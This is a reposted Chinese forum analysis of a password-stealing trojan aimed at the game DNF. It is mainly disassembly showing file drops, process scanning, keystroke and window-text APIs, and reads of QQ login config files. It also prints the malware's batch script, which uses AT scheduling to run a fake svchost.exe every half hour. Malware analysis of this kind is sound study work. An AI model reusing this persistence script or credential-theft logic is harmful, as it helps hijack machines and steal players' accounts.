搜尋

脱壳文章

返回清單
切換到指定樓層
通知這文章過時或找檔案 發表主題

[VB] 【轉貼】線上遊戲DNF盜帳密木馬-分析源碼

[複製連結]
1
SheepKingCN ( Lv.80 論壇達人 ) 發表於 2013-8-31 15:12:30 | 只看該作者 回覆獎勵 |降序瀏覽 |閱讀模式
此為本人學習、無聊研究用,為了要備份文章,所以才發在這裡。

作者: 中國大陸-当红小生
  1. 7339EDA9 . 50 push eax ; /pVersionInformation
  2. 7339EDAA . 33FF xor edi,edi ; |
  3. 7339EDAC . C785 54FFFFFF>mov dword ptr ss:[ebp-AC],94 ; |
  4. 7339EDB6 . FF15 CC103973 call dword ptr ds:[<&KERNEL32.GetVersion>; \GetVersionExA
  5. 7339EDBC . 33C0 xor eax,eax
  6. ......
  7. 7339EE1F . 8D85 68FFFFFF lea eax,dword ptr ss:[ebp-98]
  8. 7339EE25 . 68 589F3A73 push msvbvm60.733A9F58 ; Service pack
  9. 7339EE2A . 50 push eax

  10. 00406882 FF50 04 call dword ptr ds:[eax+4] ; msvbvm60.Zombie_AddRef
  11. 00406885 C745 FC 0100000>mov dword ptr ss:[ebp-4],1
  12. 0040688C C745 FC 0200000>mov dword ptr ss:[ebp-4],2
  13. 00406893 E8 48960000 call 脱壳后.0040FEE0 ; F7进去是获取目录
  14. 00406898 C745 FC 0300000>mov dword ptr ss:[ebp-4],3
  15. 0040689F 6A FF push -1 ; /OnErrEvent = Resume Next
  16. 004068A1 FF15 78F04100 call dword ptr ds:[<&msvbvm60.__vbaOnErr>; msvbvm60.__vbaOnError
  17. 004068A7 C745 FC 0400000>mov dword ptr ss:[ebp-4],4
  18. 004068AE 8B15 48504100 mov edx,dword ptr ds:[415048] ; (UNICODE "C:\WINDOWS\system32")
  19. 004068B4 52 push edx
  20. 004068B5 68 88324000 push 脱壳后.00403288 ; \Pusmint
  21. 004068BA FF15 48F04100 call dword ptr ds:[<&msvbvm60.__vbaStrCa>; msvbvm60.__vbaStrCat
  22. 004068C0 8BD0 mov edx,eax ; "C:\WINDOWS\system32\Pusmint")
  23. 004068C2 8D4D DC lea ecx,dword ptr ss:[ebp-24]
  24. 004068C5 FF15 F4F14100 call dword ptr ds:[<&msvbvm60.__vbaStrMo>; msvbvm60.__vbaStrMove
  25. 004068CB 50 push eax ; (UNICODE "C:\WINDOWS\system32\Pusmint")
  26. 004068CC FF15 40F14100 call dword ptr ds:[<&msvbvm60.rtcMakeDir>; F7
  27. 004068D2 8D4D DC lea ecx,dword ptr ss:[ebp-24] ; 创建目录
  28. 004068D5 FF15 18F24100 call dword ptr ds:[<&msvbvm60.__vbaFreeS>; msvbvm60.__vbaFreeStr
  29. 004068DB C745 FC 0500000>mov dword ptr ss:[ebp-4],5
  30. 004068E2 A1 48504100 mov eax,dword ptr ds:[415048]
  31. 004068E7 50 push eax
  32. 004068E8 68 B4324000 push 脱壳后.004032B4 ; \Pusmint\svchost.exe
  33. 004068ED FF15 48F04100 call dword ptr ds:[<&msvbvm60.__vbaStrCa>; msvbvm60.__vbaStrCat
  34. 004068F3 8BD0 mov edx,eax
  35. 004068F5 8D4D DC lea ecx,dword ptr ss:[ebp-24]
  36. 004068F8 FF15 F4F14100 call dword ptr ds:[<&msvbvm60.__vbaStrMo>; msvbvm60.__vbaStrMove

  37. 00406B9E FF15 70F14100 call dword ptr ds:[<&msvbvm60.rtcDir>] ; msvbvm60.rtcDir
  38. 00406BA4 8BD0 mov edx,eax ; (UNICODE "svchost.exe")
  39. 00406BA6 8D4D E0 lea ecx,dword ptr ss:[ebp-20]
  40. 00406BA9 FFD7 call edi ; (msvbvm60.__vbaStrMove)
  41. 00406BAB 50 push eax
  42. 00406BAC 68 3C334000 push 脱壳后.0040333C
  43. 00406BB1 FF15 BCF04100 call dword ptr ds:[<&msvbvm60.__vbaStr>; msvbvm60.__vbaStrCmp
  44. 00406BB7 8BF0 mov esi,eax
  45. 00406BB9 8D4D E0 lea ecx,dword ptr ss:[ebp-20]
  46. 00406BBC F7DE neg esi
  47. 00406BBE 1BF6 sbb esi,esi
  48. 00406BC0 46 inc esi
  49. 00406BC1 F7DE neg esi
  50. 00406BC3 FF15 18F24100 call dword ptr ds:[<&msvbvm60.__vbaFre>; msvbvm60.__vbaFreeStr

  51. 733BD096 . 51 push ecx ; /pLocalFileTime
  52. 733BD097 . 50 push eax ; |pFileTime
  53. 733BD098 . FF15 F0103973 call dword ptr ds:[<&KERNEL32.FileTime>; \FileTimeToLocalFileTime
  54. 733BD09E . 85C0 test eax,eax
  55. 733BD0A0 . 0F84 09B10100 je msvbvm60.733D81AF
  56. 733BD0A6 . 8D5424 08 lea edx,dword ptr ss:[esp+8]
  57. 733BD0AA . 8D4424 00 lea eax,dword ptr ss:[esp]
  58. 733BD0AE . 52 push edx ; /pSystemTime
  59. 733BD0AF . 50 push eax ; |pFileTime
  60. 733BD0B0 . FF15 F4103973 call dword ptr ds:[<&KERNEL32.FileTime>; \FileTimeToSystemTime

  61. 0041005C 8B35 A0F14100 mov esi,dword ptr ds:[<&msvbvm60.__vba>; msvbvm60.__vbaStrCopy
  62. 00410062 33FF xor edi,edi
  63. 00410064 8D4D D4 lea ecx,dword ptr ss:[ebp-2C]
  64. 00410067 897D EC mov dword ptr ss:[ebp-14],edi
  65. 0041006A 897D DC mov dword ptr ss:[ebp-24],edi
  66. 0041006D 897D D8 mov dword ptr ss:[ebp-28],edi
  67. 00410070 897D D4 mov dword ptr ss:[ebp-2C],edi
  68. 00410073 FFD6 call esi ; <&msvbvm60.__vbaStrCopy>
  69. 00410075 8B55 10 mov edx,dword ptr ss:[ebp+10]
  70. 00410078 8D4D EC lea ecx,dword ptr ss:[ebp-14]
  71. 0041007B FFD6 call esi ; (msvbvm60.__vbaStrCopy)
  72. 0041007D 8B45 D4 mov eax,dword ptr ss:[ebp-2C] ; "C:\Documents and Settings\Administrator\")
  73. 00410080 8B35 7CF14100 mov esi,dword ptr ds:[<&msvbvm60.__vba>; msvbvm60.__vbaFileOpen
  74. 00410086 50 push eax
  75. 00410087 6A 01 push 1
  76. 00410089 6A FF push -1
  77. 0041008B 68 20010000 push 120
  78. 00410090 FFD6 call esi ; <&msvbvm60.__vbaFileOpen>
  79. 00410092 57 push edi
  80. 00410093 6A 01 push 1
  81. 00410095 FF15 88F14100 call dword ptr ds:[<&msvbvm60.rtcFileL>; msvbvm60.rtcFileLength
  82. 0041009B 8B3D F8F04100 mov edi,dword ptr ds:[<&msvbvm60.__vba>; msvbvm60.__vbaRedim
  83. 004100A1 50 push eax
  84. 004100A2 6A 01 push 1
  85. 004100A4 8D4D D8 lea ecx,dword ptr ss:[ebp-28]
  86. 004100A7 6A 11 push 11
  87. 004100A9 51 push ecx
  88. 004100AA 6A 01 push 1
  89. 004100AC 68 80000000 push 80
  90. 004100B1 FFD7 call edi ; (msvbvm60.__vbaRedim)
  91. 004100B3 83C4 1C add esp,1C
  92. 004100B6 8D55 D8 lea edx,dword ptr ss:[ebp-28]
  93. 004100B9 6A 01 push 1
  94. 004100BB 52 push edx
  95. 004100BC 68 244A4000 push 脱壳后.00404A24
  96. 004100C1 FF15 50F14100 call dword ptr ds:[<&msvbvm60.__vbaGet>; msvbvm60.__vbaGetOwner3
  97. 004100C7 8B1D A4F04100 mov ebx,dword ptr ds:[<&msvbvm60.__vba>; msvbvm60.__vbaFileClose
  98. 004100CD 6A 01 push 1
  99. 004100CF FFD3 call ebx ; <&msvbvm60.__vbaFileClose>
  100. 004100D1 8B45 EC mov eax,dword ptr ss:[ebp-14]
  101. 004100D4 50 push eax
  102. 004100D5 6A 02 push 2
  103. 004100D7 6A FF push -1
  104. 004100D9 6A 20 push 20 ; 看函数名就知道有动作了。。。
  105. 004100DB FFD6 call esi ; (msvbvm60.__vbaFileOpen)

  106. 00407281 C745 FC 0900000>mov dword ptr ss:[ebp-4],9
  107. 00407288 6A FF push -1
  108. 0040728A FF15 78F04100 call dword ptr ds:[<&msvbvm60.__>; msvbvm60.__vbaOnError
  109. 00407290 C745 FC 0A00000>mov dword ptr ss:[ebp-4],0A
  110. 00407297 8B0D 48504100 mov ecx,dword ptr ds:[415048]
  111. 0040729D 51 push ecx
  112. 0040729E 68 F8364000 push 脱壳后.004036F8 ; \Pusmint\SystemDir.bat 东西还真不少
  113. 004072A3 FF15 48F04100 call dword ptr ds:[<&msvbvm60.__>; msvbvm60.__vbaStrCat
  114. 004072A9 8BD0 mov edx,eax
  115. 004072AB 8D4D C0 lea ecx,dword ptr ss:[ebp-40]
  116. 004072AE FF15 F4F14100 call dword ptr ds:[<&msvbvm60.__>; msvbvm60.__vbaStrMove
  117. 004072B4 50 push eax
  118. 004072B5 6A 01 push 1
  119. 004072B7 6A FF push -1
  120. 004072B9 6A 02 push 2
  121. 004072BB FF15 7CF14100 call dword ptr ds:[<&msvbvm60.__>; msvbvm60.__vbaFileOpen
  122. 004072C1 8D4D C0 lea ecx,dword ptr ss:[ebp-40]
  123. 004072C4 FF15 18F24100 call dword ptr ds:[<&msvbvm60.__>; msvbvm60.__vbaFreeStr
  124. {
  125. sc config Schedule start= AUTO
  126. net start schedule
  127. AT 0:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  128. AT 1:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  129. AT 2:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  130. AT 3:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  131. AT 4:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  132. AT 5:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  133. AT 6:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  134. AT 7:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  135. AT 8:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  136. AT 9:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  137. AT 10:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  138. AT 11:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  139. AT 12:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  140. AT 13:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  141. AT 14:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  142. AT 15:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  143. AT 16:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  144. AT 17:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  145. AT 18:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  146. AT 19:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  147. AT 20:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  148. AT 21:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  149. AT 22:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  150. AT 23:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  151. AT 0:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  152. AT 1:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  153. AT 2:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  154. AT 3:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  155. AT 4:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  156. AT 5:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  157. AT 6:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  158. AT 7:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  159. AT 8:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  160. AT 9:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  161. AT 10:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  162. AT 11:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  163. AT 12:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  164. AT 13:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  165. AT 14:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  166. AT 15:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  167. AT 16:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  168. AT 17:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  169. AT 18:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  170. AT 19:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  171. AT 20:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  172. AT 21:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  173. AT 22:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  174. AT 23:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  175. }
複製代碼
我是分隔線

  1. 00402F43 00 db 00
  2. 00402F44 $ A1 FC564100 mov eax,dword ptr ds:[4156FC]
  3. 00402F49 . 0BC0 or eax,eax
  4. 00402F4B . 74 02 je short svchost.00402F4F
  5. 00402F4D . FFE0 jmp eax
  6. 00402F4F > 68 2C2F4000 push svchost.00402F2C ; FindWindowA
  7. 00402F54 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionC>
  8. 00402F59 . FFD0 call eax
  9. 00402F5B . FFE0 jmp eax ; user32.FindWindowA
  10. 00402F5D 00 db 00
  11. 00402F5E 00 db 00

  12. 00403034   [        DISCUZ_CODE_4        ]nbsp; A1 20574100   mov eax,dword ptr ds:[415720]
  13. 00403039   .  0BC0          or eax,eax
  14. 0040303B   .  74 02         je short svchost.0040303F
  15. 0040303D   .  FFE0          jmp eax
  16. 0040303F   >  68 1C304000   push svchost.0040301C                    ;  user32
  17. 00403044   .  B8 201B4000   mov eax,<jmp.&msvbvm60.DllFunctionCall>
  18. 00403049   .  FFD0          call eax
  19. 0040304B   .  FFE0          jmp eax                                  ;  SendMessageA

  20. 0040307C   [        DISCUZ_CODE_4        ]nbsp; A1 2C574100   mov eax,dword ptr ds:[41572C]
  21. 00403081   .  0BC0          or eax,eax
  22. 00403083   .  74 02         je short svchost.00403087
  23. 00403085   .  FFE0          jmp eax
  24. 00403087   >  68 64304000   push svchost.00403064                    ;  
  25. 0040308C   .  B8 201B4000   mov eax,<jmp.&msvbvm60.DllFunctionCall>
  26. 00403091   .  FFD0          call eax
  27. 00403093   .  FFE0          jmp eax                                  ;  RtlMoveMemory

  28. 00403114   [        DISCUZ_CODE_4        ]nbsp; A1 44574100   mov eax,dword ptr ds:[415744]
  29. 00403119   .  0BC0          or eax,eax
  30. 0040311B   .  74 02         je short svchost.0040311F
  31. 0040311D   .  FFE0          jmp eax
  32. 0040311F   >  68 FC304000   push svchost.004030FC               ;  
  33. 00403124   .  B8 201B4000   mov eax,<jmp.&msvbvm60.DllFunctionC>
  34. 00403129   .  FFD0          call eax
  35. 0040312B   .  FFE0          jmp eax                             ;  GetForegroundWindow

  36. 0040315C   [        DISCUZ_CODE_4        ]nbsp; A1 50574100   mov eax,dword ptr ds:[415750]
  37. 00403161   .  0BC0          or eax,eax
  38. 00403163   .  74 02         je short svchost.00403167
  39. 00403165   .  FFE0          jmp eax
  40. 00403167   >  68 44314000   push svchost.00403144               ;  user32
  41. 0040316C   .  B8 201B4000   mov eax,<jmp.&msvbvm60.DllFunctionC>
  42. 00403171   .  FFD0          call eax
  43. 00403173   .  FFE0          jmp eax                             ;  GetWindowTextA


  44. 0040501F   > \68 FC4F4000   push svchost.00404FFC                    ;  GetClassNameA
  45. 00405024   .  B8 201B4000   mov eax,<jmp.&msvbvm60.DllFunctionCall>
  46. 00405029   .  FFD0          call eax
  47. 0040502B   .  FFE0          jmp eax                                  ;  GetClassNameA


  48. 0040349C $ A1 A4574100 mov eax,dword ptr ds:[4157A4]
  49. 004034A1 . 0BC0 or eax,eax
  50. 004034A3 . 74 02 je short svchost.004034A7
  51. 004034A5 . FFE0 jmp eax
  52. 004034A7 > 68 84344000 push svchost.00403484 ; RegisterWindowMessageA
  53. 004034AC . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionC>
  54. 004034B1 . FFD0 call eax
  55. 004034B3 . FFE0 jmp eax

  56. 0040344C $ A1 98574100 mov eax,dword ptr ds:[415798]
  57. 00403451 . 0BC0 or eax,eax
  58. 00403453 . 74 02 je short svchost.00403457
  59. 00403455 . FFE0 jmp eax
  60. 00403457 > 68 34344000 push svchost.00403434 ; RegisterShellHookWindow
  61. 0040345C . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunction>
  62. 00403461 . FFD0 call eax
  63. 00403463 . FFE0 jmp eax

  64. 00403543 > \68 20354000 push svchost.00403520 ; SetWindowLongA
  65. 00403548 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctio>
  66. 0040354D . FFD0 call eax
  67. 0040354F .- FFE0 jmp eax ; user32.SetWindowLongA

  68. 00402EA4 $ A1 F0564100 mov eax,dword ptr ds:[4156F0]
  69. 00402EA9 . 0BC0 or eax,eax
  70. 00402EAB . 74 02 je short svchost.00402EAF
  71. 00402EAD . FFE0 jmp eax
  72. 00402EAF > 68 8C2E4000 push svchost.00402E8C ; GetWindowThreadProcessId

  73. 00402EB4 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctio>
  74. 00402EB9 . FFD0 call eax
  75. 00402EBB .- FFE0 jmp eax ; user32.GetWindowThreadProcessId

  76. 00411639 . 6A 03 push 3 ; /varType = Long
  77. 0041163B . 8D45 C8 lea eax,dword ptr ss:[ebp-38] ; |
  78. 0041163E . 33FF xor edi,edi ; |
  79. 00411640 . 68 005B4000 push svchost.00405B00 ; |ArraySturctdes = svchost.00405B00
  80. 00411645 . 50 push eax ; |ArrayVar
  81. 00411646 . 897D E0 mov dword ptr ss:[ebp-20],edi ; |
  82. 00411649 . 897D BC mov dword ptr ss:[ebp-44],edi ; |
  83. 0041164C . 897D B8 mov dword ptr ss:[ebp-48],edi ; |
  84. 0041164F . 897D A8 mov dword ptr ss:[ebp-58],edi ; |
  85. 00411652 . 897D A4 mov dword ptr ss:[ebp-5C],edi ; |
  86. 00411655 . FF15 CCF04100 call dword ptr ds:[<&msvbvm60.__v>; \__vbaAryConstruct2
  87. 0041165B . 8B4D 08 mov ecx,dword ptr ss:[ebp+8]
  88. 0041165E . 51 push ecx
  89. 0041165F . 57 push edi
  90. 00411660 . 68 10040000 push 410
  91. 00411665 . E8 361BFFFF call svchost.004031A0 ; 打开进程
  92. {
  93. 004031A0 $ A1 5C574100 mov eax,dword ptr ds:[41575C]
  94. 004031A5 . 0BC0 or eax,eax
  95. 004031A7 . 74 02 je short svchost.004031AB
  96. 004031A9 . FFE0 jmp eax
  97. 004031AB > 68 88314000 push svchost.00403188 ; OpenProcess
  98. 004031B0 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctio>
  99. 004031B5 . FFD0 call eax
  100. 004031B7 .- FFE0 jmp eax ; kernel32.OpenProcess
  101. }
  102. 0041166A . 8B35 50F04100 mov esi,dword ptr ds:[<&msvbvm60.>; msvbvm60.__vbaSetSystemError
  103. 00411670 . 8945 A4 mov dword ptr ss:[ebp-5C],eax
  104. 00411673 . FFD6 call esi ; <&msvbvm60.__vbaSetSystemError>

  105. 004116A8 . FF15 A8F04100 call dword ptr ds:[<&msvbvm60.rtc>; msvbvm60.rtcSpaceVar
  106. 004116AE . 8D45 A8 lea eax,dword ptr ss:[ebp-58]
  107. 004116B1 . 50 push eax
  108. 004116B2 . FF15 18F04100 call dword ptr ds:[<&msvbvm60.__v>; msvbvm60.__vbaStrVarMove
  109. 004116B8 . 8BD0 mov edx,eax
  110. 004116BA . 8D4D BC lea ecx,dword ptr ss:[ebp-44]
  111. 004116BD . FF15 F4F14100 call dword ptr ds:[<&msvbvm60.__v>; msvbvm60.__vbaStrMove
  112. 004116C3 . 8D4D A8 lea ecx,dword ptr ss:[ebp-58]
  113. 004116C6 . FF15 10F04100 call dword ptr ds:[<&msvbvm60.__v>; msvbvm60.__vbaFreeVar
  114. 004116CC . 8B4D BC mov ecx,dword ptr ss:[ebp-44]
  115. 004116CF . 68 F4010000 push 1F4
  116. 004116D4 . 8D55 B8 lea edx,dword ptr ss:[ebp-48]
  117. 004116D7 . 51 push ecx
  118. 004116D8 . 52 push edx
  119. 004116D9 . FF15 D8F14100 call dword ptr ds:[<&msvbvm60.__v>; msvbvm60.__vbaStrToAnsi


  120. 00404B28 $ A1 F8574100 mov eax,dword ptr ds:[4157F8]
  121. 00404B2D . 0BC0 or eax,eax
  122. 00404B2F . 74 02 je short svchost.00404B33
  123. 00404B31 . FFE0 jmp eax
  124. 00404B7F   > \68 5C4B4000   push svchost.00404B5C                    ;  EnumProcessModules
  125. 00404B84   .  B8 201B4000   mov eax,<jmp.&msvbvm60.DllFunctionCall>
  126. 00404B89   .  FFD0          call eax
  127. 00404B8B   .  FFE0          jmp eax                                  ;  EnumProcessModules


  128. 004116F9 . FF15 20F14100 call dword ptr ds:[<&msvbvm60.__v>; msvbvm60.__vbaStrToUnicode
  129. 004116FF . 8D4D B8 lea ecx,dword ptr ss:[ebp-48]
  130. 00411702 . FF15 18F24100 call dword ptr ds:[<&msvbvm60.__v>; msvbvm60.__vbaFreeStr
  131. 00411708 . 8B55 BC mov edx,dword ptr ss:[ebp-44]
  132. 0041170B . 8D4D E0 lea ecx,dword ptr ss:[ebp-20]
  133. 0041170E . FF15 A0F14100 call dword ptr ds:[<&msvbvm60.__v>; msvbvm60.__vbaStrCopy

  134. 00403230 $ A1 74574100 mov eax,dword ptr ds:[415774]
  135. 00403235 . 0BC0 or eax,eax
  136. 00403237 . 74 02 je short svchost.0040323B
  137. 00403239 . FFE0 jmp eax
  138. 0040323B > 68 18324000 push svchost.00403218 ; CloseHandle
  139. 00403240 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunction>
  140. 00403245 . FFD0 call eax
  141. 00403247 . FFE0 jmp eax

  142. 0040C2BC . FF15 B8F04100 call dword ptr ds:[<&msvbvm60.rt>; msvbvm60.rtcUpperCaseVar
  143. 0040C2C2 . 6A 00 push 0
  144. 0040C2C4 . 6A FF push -1
  145. 0040C2C6 . 6A 01 push 1
  146. 0040C2C8 . 68 BC4B4000 push svchost.00404BBC ; UserSetting.ini
  147. 0040C2CD . 68 A04B4000 push svchost.00404BA0 ; QQLOGIN.EXE
  148. 0040C2D2 . 8D45 B8 lea eax,dword ptr ss:[ebp-48]
  149. 0040C2D5 . 50 push eax ; /String8
  150. 0040C2D6 . 8D4D D0 lea ecx,dword ptr ss:[ebp-30] ; |
  151. 0040C2D9 . 51 push ecx ; |ARG2 = 0012FB48
  152. 0040C2DA . FF15 54F14100 call dword ptr ds:[<&msvbvm60.__>; \__vbaStrVarVal

  153. 0040C322 . FF15 B8F04100 call dword ptr ds:[<&msvbvm60.rt>; msvbvm60.rtcUpperCaseVar
  154. 0040C328 . 6A 00 push 0
  155. 0040C32A . 6A FF push -1
  156. 0040C32C . 6A 01 push 1
  157. 0040C32E . 68 E04B4000 push svchost.00404BE0 ; config\Info.ini
  158. 0040C333 . 68 A04B4000 push svchost.00404BA0 ; QQLOGIN.EXE
  159. 0040C338 . 8D55 B8 lea edx,dword ptr ss:[ebp-48]
  160. 0040C33B . 52 push edx ; /String8
  161. 0040C33C . 8D45 D0 lea eax,dword ptr ss:[ebp-30] ; |
  162. 0040C33F . 50 push eax ; |ARG2
  163. 0040C340 . FF15 54F14100 call dword ptr ds:[<&msvbvm60.__>; \__vbaStrVarVal


  164. 0040C673 . BA 044C4000 mov edx,svchost.00404C04 ; dnf.exe
  165. 0040C678 . 8D4D CC lea ecx,dword ptr ss:[ebp-34]
  166. 0040C67B . FF15 A0F14100 call dword ptr ds:[<&msvbvm60.__vbaStrCo>; msvbvm60.__vbaStrCopy
  167. 0040C681 . 8D55 CC lea edx,dword ptr ss:[ebp-34]

  168. 00404C6F > \68 4C4C4000 push svchost.00404C4C ; CreateToolhelp32Snapshot
  169. 00404C74 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionCal>
  170. 00404C79 . FFD0 call eax
  171. 00404C7B .- FFE0 jmp eax ; kernel32.CreateToolhelp32Snapshot

  172. 00404CD3 > \68 B04C4000 push svchost.00404CB0 ; Process32First
  173. 00404CD8 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionC>
  174. 00404CDD . FFD0 call eax
  175. 00404CDF . FFE0 jmp eax ; Process32First

  176. 00404D1B > \68 F84C4000 push svchost.00404CF8 ; Process32Next
  177. 00404D20 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionC>
  178. 00404D25 . FFD0 call eax
  179. 00404D27 .- FFE0 jmp eax ; kernel32.Process32Next

  180. 0040C685 . E8 064C0000 call svchost.00411290 ; 创建快照
  181. 0040C68A . 8945 D8 mov dword ptr ss:[ebp-28],eax
  182. 0040C68D . 8D4D CC lea ecx,dword ptr ss:[ebp-34]
  183. 0040C690 . FF15 18F24100 call dword ptr ds:[<&msvbvm60.__vba>; msvbvm60.__vbaFreeStr
  184. 0040C696 . C745 FC 03000>mov dword ptr ss:[ebp-4],3
  185. 0040C69D . 837D D8 00 cmp dword ptr ss:[ebp-28],0
  186. 0040C6A1 . 0F84 62240000 je svchost.0040EB09 这个是判断是否有DNF.exe
  187. 0040C6A7 . C745 FC 04000>mov dword ptr ss:[ebp-4],4


  188. 004034FB > \68 D8344000 push svchost.004034D8 ; DeregisterShellHookWindow
  189. 00403500 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionC>
  190. 00403505 . FFD0 call eax
  191. 00403507 . FFE0 jmp eax


  192. 733A03F6    BB B8A63A73     mov ebx,msvbvm60.733AA6B8             ; ThunderRT6Main   
  193. 733A03FB    50              push eax
  194. 733A03FC    53              push ebx
  195. 733A03FD    FF35 D0064A73   push dword ptr ds:[734A06D0]          ; msvbvm60.73390000
  196. 733A0403    FF15 F8123973   call dword ptr ds:[<&USER32.GetClassI>; user32.GetClassInfoExA
  197. 733A0409    33F6            xor esi,esi
  198. 733A040B    85C0            test eax,eax
  199. 733A040D    75 71           jnz short msvbvm60.733A0480
  200. 733A040F    6A 0C           push 0C
  201. 733A0411    8D7D CC         lea edi,dword ptr ss:[ebp-34]
  202. 733A0414    59              pop ecx
  203. 733A0415    6A 01           push 1
  204. 733A0417    FF35 D4064A73   push dword ptr ds:[734A06D4]          ; svchost.00400000

  205. 733A130E . BF 10A93A73 mov edi,msvbvm60.733AA910 ; ASCII "VBMsoStdCompMgr"
  206. 733A1313 . 68 55133A73 push msvbvm60.733A1355
  207. 733A1318 . 57 push edi
  208. 733A1319 . E8 7DDEFFFF call msvbvm60.7339F19B

  209. 004035D0   [        DISCUZ_CODE_4        ]nbsp; A1 D4574100   mov eax,dword ptr ds:[4157D4]
  210. 004035D5   .  0BC0          or eax,eax
  211. 004035D7   .  74 02         je short svchost.004035DB
  212. 004035D9   .  FFE0          jmp eax
  213. 004035DB   >  68 B8354000   push svchost.004035B8                    ;  user32
  214. 004035E0   .  B8 201B4000   mov eax,<jmp.&msvbvm60.DllFunctionCall>
  215. 004035E5   .  FFD0          call eax
  216. 004035E7   .  FFE0          jmp eax                                  ;  GetWindowTextLengthW

  217. 0040364D   .  0BC0          or eax,eax
  218. 0040364F   .  74 02         je short svchost.00403653
  219. 00403651   .  FFE0          jmp eax
  220. 00403653   >  68 30364000   push svchost.00403630                    ;  user32
  221. 00403658   .  B8 201B4000   mov eax,<jmp.&msvbvm60.DllFunctionCall>
  222. 0040365D   .  FFD0          call eax
  223. 0040365F   .  FFE0          jmp eax                                  ;  GetKeyState

  224. 00403690   [        DISCUZ_CODE_4        ]nbsp; A1 EC574100   mov eax,dword ptr ds:[4157EC]
  225. 00403695   .  0BC0          or eax,eax
  226. 00403697   .  74 02         je short svchost.0040369B
  227. 00403699   .  FFE0          jmp eax
